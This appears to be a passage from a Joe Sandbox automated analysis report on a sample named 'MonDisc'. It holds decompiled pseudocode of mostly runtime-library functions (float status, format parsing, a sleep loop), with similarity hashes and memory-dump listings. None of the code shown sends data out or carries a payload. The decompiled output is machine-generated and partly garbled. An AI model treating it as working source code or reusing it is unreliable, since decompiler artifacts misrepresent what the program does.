                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 3115360832-0
                              • Opcode ID: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction ID: 6179a57cf51987d04aed77a4880a1fac33de67376ad0af2380a3bdb4d03797b4
                              • Opcode Fuzzy Hash: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction Fuzzy Hash: 3E313032608B85C6DB65CF15E8802AAB3A5FB88B50F444536DB8D83759DF3CD659CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D0FB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 85%
                              			E00007FF67FF62C9D0FB8(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x2c9d0fea;
				if (sil >= 0) goto 0x2c9d0fea;
				E00007FF67FF62C9D0F1C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x2c9d1041;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x2c9d1005;
				asm("dec eax");
				if (_t42 >= 0) goto 0x2c9d1005;
				E00007FF67FF62C9D0F1C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x2c9d1041;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x2c9d1021;
				asm("dec eax");
				if (_t43 >= 0) goto 0x2c9d1021;
				E00007FF67FF62C9D0F1C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x2c9d1041;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x2c9d1041;
				asm("dec eax");
				if (_t44 >= 0) goto 0x2c9d1041;
				if ((dil & 0x00000010) == 0) goto 0x2c9d103e;
				E00007FF67FF62C9D0F1C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x2c9d105b;
				asm("dec eax");
				if (_t46 >= 0) goto 0x2c9d105b;
				E00007FF67FF62C9D0F1C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                              0x7ff62c9d0fb8
                              0x7ff62c9d0fbd
                              0x7ff62c9d0fcc
                              0x7ff62c9d0fd4
                              0x7ff62c9d0fd9
                              0x7ff62c9d0fe0
                              0x7ff62c9d0fe5
                              0x7ff62c9d0fe8
                              0x7ff62c9d0fef
                              0x7ff62c9d0ff2
                              0x7ff62c9d0ff4
                              0x7ff62c9d0ff9
                              0x7ff62c9d0ffb
                              0x7ff62c9d1000
                              0x7ff62c9d1003
                              0x7ff62c9d1005
                              0x7ff62c9d1009
                              0x7ff62c9d100b
                              0x7ff62c9d1010
                              0x7ff62c9d1017
                              0x7ff62c9d101c
                              0x7ff62c9d101f
                              0x7ff62c9d1021
                              0x7ff62c9d1025
                              0x7ff62c9d1027
                              0x7ff62c9d102c
                              0x7ff62c9d1032
                              0x7ff62c9d1039
                              0x7ff62c9d103e
                              0x7ff62c9d1041
                              0x7ff62c9d1045
                              0x7ff62c9d1047
                              0x7ff62c9d104c
                              0x7ff62c9d1053
                              0x7ff62c9d1071

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 3076e21c6bfb38f8d326eb162b095d5b0499e511dc8dc8b539aeb44edcf57da2
                              • Instruction ID: 7459ce2c7319353957be4084f52fc5ff95697936e9d656c7d1df035a8517fa8d
                              • Opcode Fuzzy Hash: 3076e21c6bfb38f8d326eb162b095d5b0499e511dc8dc8b539aeb44edcf57da2
                              • Instruction Fuzzy Hash: 8A118C73E5CA8381FF643128EE9637910416F5C374E181634EA7EA62D7CE2CA8816647
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98EEF4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00007FF67FF62C98EEF4(signed int __edi, signed short __rbx, void* __rcx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _t71;
				signed int _t72;
				intOrPtr _t81;
				signed int _t93;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				intOrPtr _t120;
				signed short* _t140;
				signed short* _t141;
				signed short* _t143;
				void* _t145;
				void* _t155;
				signed int* _t161;
				signed short* _t165;
				void* _t168;
				void* _t169;
				void* _t171;
				void* _t174;
				signed int* _t175;

				_t140 = _t165;
				_t140[4] = __rbx;
				_t140[8] = __rbp;
				_t140[0xc] = __rsi;
				_t140[0x10] = __rdi;
				_t108 = __edi | 0xffffffff;
				_t145 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == __rbp) goto 0x2c98f17a;
				if ( *(__rcx + 0x18) != __rbp) goto 0x2c98ef43;
				E00007FF67FF62C984D84(_t140);
				 *_t140 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98f191;
				r12d = 0x20;
				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
				_t71 =  *((intOrPtr*)(__rcx + 0x478));
				if (_t71 == 3) goto 0x2c98f18e;
				if (_t71 != 2) goto 0x2c98ef77;
				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x2c98f18e;
				_t141 =  *((intOrPtr*)(__rcx + 0x480));
				_t175 = __rcx + 0x34;
				_t161 = __rcx + 0x38;
				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
				 *(__rcx + 0xde8) = _t108;
				 *(__rcx + 0xdec) = _t108;
				 *_t175 = 0;
				 *_t161 = 0;
				 *(__rcx + 0x18) = _t141;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *((intOrPtr*)(__rcx + 0x2c)) = 0;
				_t72 =  *_t141 & 0x0000ffff;
				 *(__rcx + 0x42) = _t72;
				if (_t72 == 0) goto 0x2c98f164;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98f169;
				if (( *(__rcx + 0x42) & 0xffff) - r12w - 0x5a > 0) goto 0x2c98efe4;
				_t142 = __rcx - 0x20;
				goto 0x2c98efe6;
				 *((intOrPtr*)(__rcx + 0x2c)) =  *((intOrPtr*)(0x2ca11bc0 + (__rcx - 0x20) * 8));
				if (E00007FF67FF62C99A65C(__rcx, _t155) == 0) goto 0x2c98f18a;
				_t81 =  *((intOrPtr*)(_t145 + 0x2c));
				if (_t81 == 8) goto 0x2c98f17a;
				_t120 = _t81;
				if (_t120 == 0) goto 0x2c98f144;
				if (_t120 == 0) goto 0x2c98f12f;
				if (_t120 == 0) goto 0x2c98f0ef;
				if (_t120 == 0) goto 0x2c98f0ad;
				if (_t120 == 0) goto 0x2c98f0a6;
				if (_t120 == 0) goto 0x2c98f064;
				if (_t120 == 0) goto 0x2c98f057;
				if (_t81 - 0xfffffffffffffffc != 1) goto 0x2c98f18a;
				E00007FF67FF62C9935E8(_t145, _t145, _t155, __rbp, _t174);
				goto 0x2c98f14c;
				E00007FF67FF62C991C34(_t142, _t145);
				goto 0x2c98f14c;
				if ( *(_t145 + 0x42) == 0x2a) goto 0x2c98f07b;
				E00007FF67FF62C98DBB0(_t142, _t145, _t145, _t161, __rdi, _t161, _t171, _t169);
				goto 0x2c98f14c;
				if (E00007FF67FF62C99A018(_t142, _t145, _t145, _t161, _t168) == 0) goto 0x2c98f18a;
				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x2c98f09e;
				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x2c98f150;
				if ( *_t161 >= 0) goto 0x2c98f0eb;
				 *_t161 = _t108;
				goto 0x2c98f0eb;
				 *_t161 = 0;
				goto 0x2c98f150;
				if ( *(_t145 + 0x42) == 0x2a) goto 0x2c98f0bc;
				goto 0x2c98f071;
				if (E00007FF67FF62C999B68(_t142, _t145, _t145, _t161, _t168) == 0) goto 0x2c98f18a;
				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x2c98f0db;
				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x2c98f150;
				_t93 =  *_t175;
				if (_t93 >= 0) goto 0x2c98f0eb;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
				 *_t175 =  ~_t93;
				goto 0x2c98f14c;
				_t96 =  *(_t145 + 0x42) & 0x0000ffff;
				if (_t96 == r12w) goto 0x2c98f129;
				if (_t96 == 0x23) goto 0x2c98f123;
				if (_t96 == 0x2b) goto 0x2c98f11d;
				if (_t96 == 0x2d) goto 0x2c98f117;
				if (_t96 != 0x30) goto 0x2c98f150;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000008;
				goto 0x2c98f150;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
				goto 0x2c98f150;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000001;
				goto 0x2c98f150;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | r12d;
				goto 0x2c98f150;
				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000002;
				goto 0x2c98f150;
				 *_t175 = 0;
				 *((intOrPtr*)(_t145 + 0x40)) = bpl;
				 *(_t145 + 0x30) = 0;
				 *_t161 = _t108;
				 *((intOrPtr*)(_t145 + 0x3c)) = 0;
				 *((intOrPtr*)(_t145 + 0x54)) = bpl;
				goto 0x2c98f150;
				E00007FF67FF62C990430(_t145);
				if (1 == 0) goto 0x2c98f18a;
				_t143 =  *((intOrPtr*)(_t145 + 0x18));
				_t106 =  *_t143 & 0x0000ffff;
				 *(_t145 + 0x42) = _t106;
				if (_t106 != 0) goto 0x2c98efb7;
				 *((long long*)(_t145 + 0x18)) =  *((long long*)(_t145 + 0x18)) + 2;
				if (E00007FF67FF62C99AA7C(_t143, _t145) == 0) goto 0x2c98f18a;
				goto 0x2c98ef50;
				E00007FF67FF62C984D84(_t143);
				 *_t143 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98f191;
				return  *((intOrPtr*)(_t145 + 0x28));
			}























                              0x7ff62c98eef4
                              0x7ff62c98eef7
                              0x7ff62c98eefb
                              0x7ff62c98eeff
                              0x7ff62c98ef03
                              0x7ff62c98ef11
                              0x7ff62c98ef16
                              0x7ff62c98ef20
                              0x7ff62c98ef2a
                              0x7ff62c98ef2c
                              0x7ff62c98ef31
                              0x7ff62c98ef37
                              0x7ff62c98ef3e
                              0x7ff62c98ef43
                              0x7ff62c98ef50
                              0x7ff62c98ef56
                              0x7ff62c98ef5f
                              0x7ff62c98ef68
                              0x7ff62c98ef71
                              0x7ff62c98ef77
                              0x7ff62c98ef7e
                              0x7ff62c98ef82
                              0x7ff62c98ef86
                              0x7ff62c98ef8c
                              0x7ff62c98ef92
                              0x7ff62c98ef98
                              0x7ff62c98ef9b
                              0x7ff62c98ef9d
                              0x7ff62c98efa1
                              0x7ff62c98efa4
                              0x7ff62c98efa7
                              0x7ff62c98efaa
                              0x7ff62c98efb1
                              0x7ff62c98efb7
                              0x7ff62c98efbf
                              0x7ff62c98efd4
                              0x7ff62c98efd6
                              0x7ff62c98efe2
                              0x7ff62c98eff7
                              0x7ff62c98f001
                              0x7ff62c98f007
                              0x7ff62c98f00d
                              0x7ff62c98f013
                              0x7ff62c98f015
                              0x7ff62c98f01e
                              0x7ff62c98f027
                              0x7ff62c98f030
                              0x7ff62c98f035
                              0x7ff62c98f03a
                              0x7ff62c98f03f
                              0x7ff62c98f044
                              0x7ff62c98f04d
                              0x7ff62c98f052
                              0x7ff62c98f05a
                              0x7ff62c98f05f
                              0x7ff62c98f06c
                              0x7ff62c98f071
                              0x7ff62c98f076
                              0x7ff62c98f082
                              0x7ff62c98f08f
                              0x7ff62c98f098
                              0x7ff62c98f0a0
                              0x7ff62c98f0a2
                              0x7ff62c98f0a4
                              0x7ff62c98f0a6
                              0x7ff62c98f0a8
                              0x7ff62c98f0b5
                              0x7ff62c98f0ba
                              0x7ff62c98f0c3
                              0x7ff62c98f0d0
                              0x7ff62c98f0d9
                              0x7ff62c98f0db
                              0x7ff62c98f0e0
                              0x7ff62c98f0e2
                              0x7ff62c98f0e8
                              0x7ff62c98f0ed
                              0x7ff62c98f0ef
                              0x7ff62c98f0f7
                              0x7ff62c98f0fd
                              0x7ff62c98f103
                              0x7ff62c98f109
                              0x7ff62c98f10f
                              0x7ff62c98f111
                              0x7ff62c98f115
                              0x7ff62c98f117
                              0x7ff62c98f11b
                              0x7ff62c98f11d
                              0x7ff62c98f121
                              0x7ff62c98f123
                              0x7ff62c98f127
                              0x7ff62c98f129
                              0x7ff62c98f12d
                              0x7ff62c98f12f
                              0x7ff62c98f132
                              0x7ff62c98f136
                              0x7ff62c98f139
                              0x7ff62c98f13b
                              0x7ff62c98f13e
                              0x7ff62c98f142
                              0x7ff62c98f147
                              0x7ff62c98f14e
                              0x7ff62c98f150
                              0x7ff62c98f154
                              0x7ff62c98f157
                              0x7ff62c98f15e
                              0x7ff62c98f164
                              0x7ff62c98f173
                              0x7ff62c98f175
                              0x7ff62c98f17a
                              0x7ff62c98f17f
                              0x7ff62c98f185
                              0x7ff62c98f18c
                              0x7ff62c98f1af

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 275899da83e6f953a675a57fdfb1b8234a7f4d34997464dc48c4c510f8842327
                              • Instruction ID: 3b4b2037375902518b116183210ab80c1cdc5c7cb189c0ef7cce0ea0db0534cd
                              • Opcode Fuzzy Hash: 275899da83e6f953a675a57fdfb1b8234a7f4d34997464dc48c4c510f8842327
                              • Instruction Fuzzy Hash: D881AF72D18202CAEF649F25C844A7C37A4EB05BA8F546235CA4DC739ADF3EE541CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E108 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E108(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e15f;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				return __edi | 0xffffffff;
			}



                              0x7ff62c98e108
                              0x7ff62c98e10d
                              0x7ff62c98e112
                              0x7ff62c98e132
                              0x7ff62c98e134
                              0x7ff62c98e139
                              0x7ff62c98e13f
                              0x7ff62c98e15e

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: ba5aed07b6fadc15dc00dd5cb749b4d39d53a8e2895e59b106f77d7c832d3ef9
                              • Instruction ID: 5ad8be3901c596657a861832007016cdb9c9c343930e9a8b6b4befdaed1da821
                              • Opcode Fuzzy Hash: ba5aed07b6fadc15dc00dd5cb749b4d39d53a8e2895e59b106f77d7c832d3ef9
                              • Instruction Fuzzy Hash: 5F816476C0C2C68AEF648F25886457C37A9EB16BA8F140236CB49C7797DE39E941C707
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B4268 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$sinh
                              • API String ID: 1156100317-1232919748
                              • Opcode ID: c8156585b93c5acfaba7c5c73c329d02f6965153ef06ae8bbc729b8366ed9201
                              • Instruction ID: 96863ef2efd592e5810dae0e48bf683f333171caa9206e294a9473258f34ed97
                              • Opcode Fuzzy Hash: c8156585b93c5acfaba7c5c73c329d02f6965153ef06ae8bbc729b8366ed9201
                              • Instruction Fuzzy Hash: 1B919822D28F8588DA63CB34B8513B57358AF663E5F519333E58E71A66DF6CE0838701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B3BAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$acos
                              • API String ID: 1156100317-2870037509
                              • Opcode ID: fc471cf3e77b66e404aa7a745e5a39227ae5e81015ea62415c338c8aefb05f38
                              • Instruction ID: 200d9f966abe40536c337745dca57c5106090a6eb0e15dd5b1ea0ad545c30246
                              • Opcode Fuzzy Hash: fc471cf3e77b66e404aa7a745e5a39227ae5e81015ea62415c338c8aefb05f38
                              • Instruction Fuzzy Hash: 3361B721D2CF4989EA23CB38BC503769754BF663E0F128336E95EB5D65DF2CE0824601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B3878 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$asin
                              • API String ID: 1156100317-2188059690
                              • Opcode ID: 7113f2bb44cd2ffda8fc6149d82887779e1fba1a3ae1f7fd9967d967e71fe84d
                              • Instruction ID: 0c5ae3d423a0b421fa46ed97eb2e0c5186bf3e96162fbb34071268e2e97ff6d5
                              • Opcode Fuzzy Hash: 7113f2bb44cd2ffda8fc6149d82887779e1fba1a3ae1f7fd9967d967e71fe84d
                              • Instruction Fuzzy Hash: C751A921D2CF49C5EA13CB38BC51376A354BF663E0F128336E95EB5A65DF2DA0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C916910 Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E00007FF67FF62C916910(long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rbp, long long __r14, long long _a8, long long _a16, long long _a24, long long _a32) {
				intOrPtr _t37;
				signed char _t40;
				void* _t58;
				intOrPtr _t60;
				void* _t67;
				void* _t68;
				void* _t71;

				_a32 = __rbx;
				 *((intOrPtr*)(__rcx + 0x50))();
				Sleep(??);
				if ( *((intOrPtr*)(__rcx + 0x90)) != 0) goto 0x2c9169db;
				_a8 = __rbp;
				_a16 = __rdi;
				_a24 = __r14;
				r14d = 0x47;
				_t60 =  *__rcx;
				E00007FF67FF62C9EE0B0();
				 *((intOrPtr*)(__rcx + 0x3c)) =  *((intOrPtr*)(__rcx + 0x3c)) + 1;
				_t40 =  *(_t60 + 0x91) & 0x000000ff;
				if ((_t40 & 0x000000e0) != 0) goto 0x2c9169b1;
				_t37 =  *((intOrPtr*)(_t60 + 0xb8));
				if (_t37 < 0) goto 0x2c91697d;
				goto 0x2c91699d;
				if (_t37 != 0xffffffff) goto 0x2c916987;
				goto 0x2c91699d;
				if (_t37 != 0xfffffffe) goto 0x2c916991;
				goto 0x2c91699d;
				_t31 =  ==  ? r14d : 0x4a;
				 *((intOrPtr*)(__rcx + 0x40)) =  ==  ? r14d : 0x4a;
				 *(_t60 + 0x91) = _t40 | 0x00000080;
				E00007FF67FF62C8FFCF0(_t37, __rcx, _t60, _t58, _t60, __rbp, _t67, _t68, __r14, _t71);
				E00007FF67FF62C9EE0B8();
				Sleep(??);
				if ( *((intOrPtr*)(__rcx + 0x90)) == 0) goto 0x2c916950;
				 *((intOrPtr*)(__rcx + 0x58))();
				return 0;
			}










                              0x7ff62c916910
                              0x7ff62c916922
                              0x7ff62c916927
                              0x7ff62c916934
                              0x7ff62c91693a
                              0x7ff62c91693f
                              0x7ff62c916944
                              0x7ff62c916949
                              0x7ff62c916950
                              0x7ff62c916957
                              0x7ff62c91695d
                              0x7ff62c916960
                              0x7ff62c91696a
                              0x7ff62c91696c
                              0x7ff62c916974
                              0x7ff62c91697b
                              0x7ff62c916980
                              0x7ff62c916985
                              0x7ff62c91698a
                              0x7ff62c91698f
                              0x7ff62c916999
                              0x7ff62c9169a0
                              0x7ff62c9169a6
                              0x7ff62c9169ac
                              0x7ff62c9169b5
                              0x7ff62c9169bd
                              0x7ff62c9169ca
                              0x7ff62c9169dd
                              0x7ff62c9169ec

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
